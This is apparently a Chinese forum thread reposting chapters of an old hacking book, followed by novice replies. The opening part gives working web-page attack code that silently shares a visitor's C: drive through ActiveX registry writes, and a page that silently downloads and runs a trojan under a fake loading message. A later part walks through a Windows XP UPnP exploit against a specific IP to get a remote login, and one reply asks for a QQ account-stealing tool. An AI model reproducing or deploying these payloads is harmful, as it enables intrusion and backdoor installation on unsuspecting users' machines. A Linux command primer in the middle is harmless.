来提意见！！！  91高人进......！ [复制链接]

基于网页的攻击

5.7 基于网页的攻击

由于Microsoft的浏览器存在着严重的安全漏洞，导致人们在日常浏览网页时使系统遭受攻击，比如：万花谷病毒、混客炸弹、恶意代码、浏览网页时被加载木马、格式化硬盘、共享硬盘等。接下来看看这些攻击者是如何来利用别人在浏览网页时攻击他人计算机的。

5.7.1 攻击类

1. 共享他人硬盘

在Windows 98中存在个共享漏洞，即在注册表的以下键值中：

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面添加个键如C$然后再加几个键值：

"Flags"=dword:00000302

"Type"=dword:00000000

"Path"="C:\\"

这样系统就会把C盘设为共享了，共享名为RWC$，而且网络属性中还看不到。如果把"Flags"=dword:00000302 改成

"Flags"=dword:00000402

就可看到， 源程序如下：

******************************************************************************

<script language=javascript>

document.write("");

function f(){

a1=document.applets[0];

a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();

Shl = a1.GetObject();

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD" );

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD" );

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\" );

}

function init()

{

setTimeout("f()", 1000);

}

init();

******************************************************************************

将上面代码另存为htm，这样当对方浏览过这个页面的时候，对方的C盘就被悄悄地共享了。

2. 通过网页加载木马

当受害者用浏览器浏览一个网页的时候，一个EXE的文件就在后台悄悄地被自动下载并运行，攻击者可以把这个EXE换成一个很小的木马(比如孤独剑客的WinShell，大小只有5k)。当受害者浏览该网页后，该木马就被悄悄地下载并运行，从而受害者的计算机就会被打开了一个后门，为攻击者提供了入侵的窗口，源程序如下：

******************************************************************************

<script language="javascript">

run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""

run_exe+="CODEBASE=\"server.exe#version=1,1,1,1\">"

run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"

run_exe+="</OBJECT>"

run_exe+="<Html><h1>网页加载中，请稍后....</h1></Html>";

document.open();

document.clear();

document.writeln(run_exe);

document.close();

</script>

******************************************************************************

将以上代码另存为htm文件后，同server.exe(木马)上传到一个主页空间里。当受害者浏览该网页看到“网页加载中，请稍后....”的时候，那个同路径下的server.exe文件也会被无条件执行。

死人我都看不明白！  也不知道怎么做！

我才是菜鸟~~你发那些我一个都看不明白

  我也是~  希望有人做我师傅  +QQ  498292611

Windows XP的UPnP入侵

6.12 Windows XP的UPnP入侵

UpnP(UniversalPlugandPlay即插即用)能够自动识别安装到网络中的设备。但是现在发现它存在漏洞，UPnP服务不能正确地处理某些特殊构造的请求，对于Windows98/98SE/ME，受影响系统将减缓运行或系统崩溃。现在又有人开发出来了针对此漏洞的攻击程序，接下来进行此漏洞的入测试。

被测试系统：Windows XP

测试主机：61.185.151.137

测试工具：XPUPNP




(1) 在命令提示符下运行XPUPNP。



xpupnp运行格式为：

xpupnp <目标主机地址> <指令>

(2) 对目标机61.185.151.137进行攻击时运用如下命令：

xpupnp 61.185.151.137 –e






(3) 些时即可通过5000端口远程登录到61.185.151.137主机上，选择【开始】→【运行】，在【运行】对话框的【打开】下拉列表框中输入如下命令：

telnet 61.185.151.137 5000

然后单击【确定】按钮，等待几秒钟就可以登录到目标机。

Linux/Unix基本使用方法

Linux操作系统是基于Unix操作系统开发出来的，因而在命令的使用上大体相同，接下来以Linux为例，看看它们的命令具体使用方法。

1. 启动

Linux的启动操作过程和DOS相似(尽管如此，但作为操作系统本身，Linux在启动和退出时所作的工作要比DOS快得多)，也可以通过按下Ctrl＋Alt＋Del键进行热启动。不同的是Linux启动到最后时需要进行登录。下面是一个典型的登录过程：

……

RedHat Linux release 5.1

Kernel 2.0.32 on an i686

login:

输入root后，按Enter键，计算机提示输入口令(password)，则应输入相应的用户的口令(如果是第一次启动，则是在安装时所输入的口令)即可。当计算机出现一个＃提示符时，表明登录成功!

[root@localhost root]＃_ Linux提示符

C:\>_ DOS提示符

2. 常用的一些命令

● 显示文件目录命令ls(DOS下为DIR)

在Linux中用ls命令显示文件及目录(当然，仍然也可用DIR命令，只不过在这里的参数不同)。例如：

[root@localhost root]#ls <回车>

root mnt boot dev bin usr xiong tmp etc games

看起来似乎简单(就相当于DOS中的Dir／W)，但会发现有些难懂，连哪些是目录哪些是文件都不清楚，哪些又是可执行文件呢?不要紧请输入：

[root@localhost root]#ls –F+root／mnt／boot／dev／bin／usr／xiong*tmp／etc／ games／readme

看清楚了吧，带*为可执行文件(相当于DOS中的EXE和COM文件)，带／为子目录，其他的为通用文件。另外，可用ls -l显示文件目录的详细情况(相当于DOS中的Dir命令)。注意要区分大小写，如：LS –f、Ls等都是错误的。另外，ls命令还有许多参数，可以用man ls去进一步了解。

● 改变当前目录命令cd(DOS下为CD)

在DOS中，可以用C:\>CD\MNT\cdrom或cd\mnt\cdrom

C:\mnt\cdrom>cd ..或cd..或CD..

C:\mnt>cd\或C:\mnt>cd \

在Linux中为cd ／mnt／cdrom，目录名的大小写必须与实际相同，cd后必须有空格。

pwd 显示当前目录

cd .. 必须为小写，必须有空格

cd ／总目录为／，cd与/必须有空格

● 建立子目录mkdir(DOS下为MD或MKDIR)

在Linux中只能用mkdir，可用相对路径和绝对路径，请比较：

C:\>md xiong或md \xiong或md\xiong DOS系统

[root@localhost root]#mkdir xiong或mkdir ／xiong Linux系统

● 删除子目录命令rmdir(DOS下为RD)

在Linux中用rmdir命令删除子目录，例如：

[root@localhost root]rmdir ／mnt／cdrom 相当于rd \mnt\cdrom

注意：

同DOS一样，要删除的子目录必须是空的，而且必须在上一级目录中才能删除下一级子目录。

● 删除文件命令RM(DOS下为DEL或EARSE)

在Linux中用RM命令删除文件，例：

[root@localhost root]rm ／ucdos.bat 相当于del \ucdos.bat

3. 文件改名命令mv(DOS下为REN或RENAME)

在Linux中用mv命令给文件改名，例：

[root@localhost root]#mv ／mnt\floppy p相当于 ren \mnt\floppy p

提示：

在Linux中的mv命令除了文件改名外，还有移动文件的功能，请看例子：

[root@localhost root]#mv ／mnt／floppy ／bin

相当于DOS中的命令move \mnt\floppy \bin。

4. 文件复制命令cp(DOS下为Copy)

在Linux中用cp命令进行文件复制，例：

[root@localhost root]#cp ／ucdos／*／fox

相当于DOS命令copy \ucdos\*.* \fox

注意：

DOS中的*.*在Linux中用*代替。

5. 获取帮助信息命令man(DOS下为Help)

在Linux中用man命令获取帮助信息，例：

[root@localhost root]#man ls

6. 显示文件的内容less(DOS下为Type)

在Linux中用less命令进行文件显示工作，例如，要显示man1子目录下的mwm.lx的内容，只需输入：

[root@localhost man1]＃less mwm.lx

在Linux中，也可用另外一个命令more来显示文件内容，例如：

[root@localhost man1]#more mwm.lx

会看到这两个命令非常相似，实际上less命令的功能要比more强一些。在Linux中，还提供了两个DOS中没有的阅读文件的命令，它们是head和tail命令，分别用来显示文件的头部和后部的部分内容。使用格式为：

head(tail) [m]

默认为n时，显示10行，例如：

head／usr／man／mwm.lx显示文件mwm.lx前10行的内容

head 15／usr／man／mwm.lx 显示文件mwm.lx前15行的内容

tail 17／usr／man／mwm.lx 显示文件mwm.lx后17行的内容

7. 重定向与管道

在DOS中，可以通过重定向与管道方便地进行一些特殊的操作，如：

c:\>dir>dirfile.txt

解释说明：

将当前目录放入文件dirfile.txt中。

c:\>type readme>>dirfile.txt

解释说明：

将文件readme的内容追加到文件dirfile中。

c:\>type readme.txt|more

解释说明：

分页显示文本文件readme.txt的内容。

在Linux中的重定向与管道操作同DOS中的操作几乎一样，上面两个例子在Linux中应为：

[root@localhost root]#ls>direct; less readme.txt|more

说明：

实际上Linux中的more和less命令本身具有分页功能。

8. 外壳程序(shell)：命令解释器(command)

在DOS系统中，绝大多数用户都是用的command.com这个命令解释器。当然，也可换用Norton或DOS4.0以后的dosshell。在Linux中，有好几种shell。常见的有ash、bash、ksh、tcsh、zsh等，从上面的环境变量中SHELL=／bin／bash可以看出用的是哪种shell，它位于何处，Linux安装时一般默认的是bash。

以上讲到的仅仅是与DOS功能相似的一些Linux命令，而作为一个多用户、多任务的操作系统，其强大的功能还远不止于此，更多的功能还在于自己的研究。

晕乎乎······

有自定义 盗Q的 没·····

找来我研究下  把我 以前的Q弄回来··

  我完全看不懂............
            有没有电脑高手！

  看到这样的工具  但是我不知道怎么传上来~  而且 我也不懂怎么用！